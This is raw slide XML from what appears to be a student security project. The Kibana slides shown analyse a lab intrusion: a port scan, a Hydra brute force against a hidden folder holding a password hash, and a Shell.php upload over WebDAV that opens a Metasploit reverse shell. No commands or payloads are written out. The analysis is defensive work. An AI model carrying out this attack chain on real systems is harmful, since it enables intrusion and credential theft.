            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="1771650"/>
            <a:ext cx="24377700" cy="11312117"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>By Identifying the traffic between the attacker machine and the web machine:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The time of the offensive attack has been occurred On June 13 2020 @03:00 PM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> The number of packets sent to the victim machine was 6,019 from the IP 192.168.1.90</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> We may indicate that was a port scan from the below panel:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{693D4B01-4749-4349-BE3B-CB0559484508}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1209676" y="4333875"/>
            <a:ext cx="13939014" cy="8496300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="266612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17"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1318" name="Google Shape;1318;p83"/>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1321" name="Google Shape;1321;p83"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>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1319" name="Google Shape;1319;p83"/>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1320" name="Google Shape;1320;p83"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>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1322" name="Google Shape;1322;p83"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>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a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323" name="Google Shape;1323;p83"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>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Red Team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Security Assessment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1324" name="Google Shape;1324;p83"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>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Blue Team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Log Analysis &amp; Attack Characterization</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1325" name="Google Shape;1325;p83"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>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Hardening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Proposed Alarms &amp; Mitigation Strategies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8E30-0BAA-4D2C-8C46-4E727C7DA35C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kibana Analysis: Find the Request for the Hidden Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{256AA78D-391C-481C-BAD0-0181B5C659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6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB668CC2-A249-40F0-B555-3EB4BE5C5325}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="1819275"/>
            <a:ext cx="24377700" cy="11264492"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The time of the request is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0"/>
              <a:t>On June 13 2020 @03:00 PM And the number of the requests was 6,019.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0"/>
              <a:t>The files were requested </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://192.168.1.105/company_folders/secret_folder/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>connect_to_corp_server</a:t>
            </a:r>
            <a:endParaRPr lang="fi-FI" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This text file containing the hash password of the root user ryan.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02763DF6-9B1D-4A99-A62D-3382DECA1CE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1459184" y="11349037"/>
            <a:ext cx="13466492" cy="1095375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{240F1B54-C9F2-4B64-AB7D-F6885F788E6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1459184" y="4219575"/>
            <a:ext cx="13466492" cy="7266277"/>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3BA50FF4-294C-4D83-9A5F-FDF7A48B4A4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="15070805" y="4219575"/>
            <a:ext cx="8960770" cy="3495676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2192024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96"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1397" name="Google Shape;1397;p94"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="487575" rIns="731350" bIns="243750" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kibana Analysis: Identifying the Brute Force Attack</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1398" name="Google Shape;1398;p94"/>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21</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1399" name="Google Shape;1399;p94"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="1914525"/>
            <a:ext cx="22942800" cy="11172825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>By checking the dashboard on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kibana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> we can identify the Brute Force attack occurred on the target machine as below:</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67B53D5C-BFFF-4439-98D9-60D6E47A7AB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1790700" y="3409950"/>
            <a:ext cx="17678400" cy="94202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171F-5E79-47DD-8696-0FF376B9C658}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kibana Analysis: Identifying the Brute Force Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C67140CD-0221-411B-9EF7-3CCFFDDFC3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ext Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA07645C-E911-4860-95C4-C238693FE2FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="1771650"/>
            <a:ext cx="24377700" cy="11312117"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We find there were 6,019 requests made by Brute force attack. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There were 6018 requests made by hydra before the attacker discover the right password and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>connect_to_corp_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file has been requested successfully 1 time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F4AE8DF-A5F6-4DD6-B3AE-BC48E368A097}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1674663" y="11944350"/>
            <a:ext cx="17975412" cy="1139417"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE8CED23-4946-406D-BEA5-6C7725295032}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1674663" y="3585788"/>
            <a:ext cx="17975412" cy="8209744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="759034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10"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1411" name="Google Shape;1411;p96"/>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Find the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1412" name="Google Shape;1412;p96"/>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1413" name="Google Shape;1413;p96"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="1762125"/>
            <a:ext cx="22942800" cy="11287125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571500" lvl="0" indent="-571500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>From the dashboard we find that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebDav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> directory has been requested 24 times. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" lvl="0" indent="-571500">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The file requested was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" lvl="0" indent="-571500">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71A42FA9-B7F9-47A7-94B2-14B424C445D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1810145" y="4314826"/>
            <a:ext cx="20906979" cy="19716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17"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1418" name="Google Shape;1418;p97"/>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Identify the Reverse Shell Upload</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1419" name="Google Shape;1419;p97"/>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1420" name="Google Shape;1420;p97"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="1771649"/>
            <a:ext cx="22942800" cy="11630025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>From the analysis we find the exploit done through reverse TCP listener session using Metasploit. As the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> initiate the reverse listener shell session and the attacker waiting until the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to be executed to access the target machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
